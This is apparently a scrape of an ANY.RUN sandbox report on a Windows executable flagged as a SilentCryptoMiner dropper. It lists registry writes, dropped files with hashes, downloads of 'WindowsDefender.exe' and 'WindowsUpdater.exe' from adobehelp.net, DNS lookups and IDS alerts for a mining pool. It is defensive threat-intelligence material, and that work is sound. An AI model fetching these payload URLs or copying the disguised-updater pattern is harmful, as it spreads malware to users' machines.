(PID) Process:(7860) yc.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(7860) yc.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(7984) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
Executable files
20
Suspicious files
40
Text files
32
Unknown types
0

Dropped files

PID
Process
Filename
Type
7464_86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exeC:\Users\admin\AppData\Local\Temp\main\file.bincompressed
MD5:AA9B56905815F8E68CD5A3FB871636FB
SHA256:E86180BF42CABC0E43DCCAC6A5AC83213D2405D02756810A79DDB2EA3F954FAB
7464_86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exeC:\Users\admin\AppData\Local\Temp\main\main.battext
MD5:5248E52EB41DA692D903D3B0568E5D9D
SHA256:74EFCF4CD2EA55354E4AD37AD89D0499BAD78042C6EBB3BBF14BD556598E595F
77167z.exeC:\Users\admin\AppData\Local\Temp\main\extracted\file_4.zipcompressed
MD5:97C0964E426B83B6AA56CB8D160409D7
SHA256:021AEEB6539551BE1DE8ECE9C13B41DC50A5D317C97CCAE170203B9E093F1CDE
7860yc.exeC:\Users\admin\AppData\Local\Temp\ycorig.exeexecutable
MD5:8198EFBEF12EB506D8E3B7B1D0F13C0F
SHA256:C9AEB9CC12F2D3F5ACB795855E2928CDAD253CA7C82FD3F5D72CE0B95EBE6BAD
77887z.exeC:\Users\admin\AppData\Local\Temp\main\extracted\file_1.zipcompressed
MD5:8CBEA872E2A16B69E1AACE3931848780
SHA256:F00FF2B632DE8CD42EEB39DF87C2494E04C86BAA01CF2DC233C81D943CFAE86D
7536cmd.exeC:\Users\admin\AppData\Local\Temp\main\file.zipcompressed
MD5:AA9B56905815F8E68CD5A3FB871636FB
SHA256:E86180BF42CABC0E43DCCAC6A5AC83213D2405D02756810A79DDB2EA3F954FAB
8176WerFault.exeC:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ycorig.exe_2a4d858f9c8433b46313eb262510d3eba04ca5d0_e64a7acc_8197303d-72d6-4a9a-a2cf-63dd5c7ba52d\Report.wer
MD5:
SHA256:
8176WerFault.exeC:\Users\admin\AppData\Local\CrashDumps\ycorig.exe.7904.dmp
MD5:
SHA256:
7464_86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exeC:\Users\admin\AppData\Local\Temp\main\7z.dllexecutable
MD5:72491C7B87A7C2DD350B727444F13BB4
SHA256:34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
7464_86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exeC:\Users\admin\AppData\Local\Temp\main\KillDuplicate.cmdtext
MD5:68CECDF24AA2FD011ECE466F00EF8450
SHA256:64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
32
TCP/UDP connections
61
DNS requests
25
Threats
10

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2316
svchost.exe
GET
200
2.16.164.91:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
NL
binary
825 b
whitelisted
5596
MoUsoCoreWorker.exe
GET
200
2.16.164.91:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
NL
binary
825 b
whitelisted
POST
200
20.190.159.23:443
https://login.live.com/RST2.srf
US
xml
10.3 Kb
unknown
POST
200
20.190.159.4:443
https://login.live.com/RST2.srf
US
11.0 Kb
unknown
POST
200
40.126.31.2:443
https://login.live.com/RST2.srf
US
xml
10.3 Kb
unknown
POST
200
20.190.159.131:443
https://login.live.com/RST2.srf
US
xml
10.3 Kb
unknown
POST
200
20.190.159.75:443
https://login.live.com/RST2.srf
US
xml
11.0 Kb
unknown
GET
200
188.114.96.3:443
https://adobehelp.net/WindowsDefender.exe
US
executable
123 Kb
unknown
GET
200
188.114.96.3:443
https://adobehelp.net/WindowsUpdater.exe
US
executable
4.59 Mb
unknown
POST
200
40.126.31.130:443
https://login.live.com/RST2.srf
US
xml
11.1 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2316
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
5596
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4064
RUXIMICS.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2.16.241.213:443
www.bing.com
Akamai International B.V.
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
2316
svchost.exe
2.16.164.91:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
5596
MoUsoCoreWorker.exe
2.16.164.91:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
4064
RUXIMICS.exe
2.16.164.91:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
4420
svchost.exe
40.126.31.128:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 51.124.78.146
whitelisted
www.bing.com
  • 2.16.241.213
  • 2.16.241.222
  • 2.16.241.218
  • 2.16.241.206
  • 2.16.241.211
  • 2.16.241.207
  • 2.16.241.205
  • 2.16.241.212
  • 2.16.241.219
whitelisted
google.com
  • 142.250.185.206
whitelisted
crl.microsoft.com
  • 2.16.164.91
  • 2.16.164.105
  • 2.16.164.90
  • 2.16.164.114
  • 2.16.164.129
  • 2.16.164.131
  • 2.16.164.113
  • 2.16.164.130
  • 2.16.164.89
  • 2.16.241.19
  • 2.16.241.12
whitelisted
login.live.com
  • 40.126.31.128
  • 20.190.159.68
  • 40.126.31.2
  • 20.190.159.130
  • 40.126.31.73
  • 20.190.159.2
  • 40.126.31.1
  • 20.190.159.0
whitelisted
watson.events.data.microsoft.com
  • 135.233.45.222
  • 135.234.160.246
whitelisted
client.wns.windows.com
  • 172.211.123.250
  • 172.211.123.248
  • 172.211.123.249
whitelisted
adobehelp.net
  • 188.114.97.3
  • 188.114.96.3
unknown
slscr.update.microsoft.com
  • 74.178.76.128
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 2.23.181.156
whitelisted

Threats

PID
Process
Class
Message
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
Misc activity
ET INFO Packed Executable Download
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
Misc activity
ET INFO Packed Executable Download
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2276
svchost.exe
Crypto Currency Mining Activity Detected
ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)
2276
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Online Pastebin Text Storage
A Network Trojan was detected
ET MALWARE SilentCryptoMiner Agent Config Inbound
2276
svchost.exe
Crypto Currency Mining Activity Detected
ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
_86a0497b6b95420d558cc3a6cbaa79f4d599474edf8910ecbca7802888464201.exe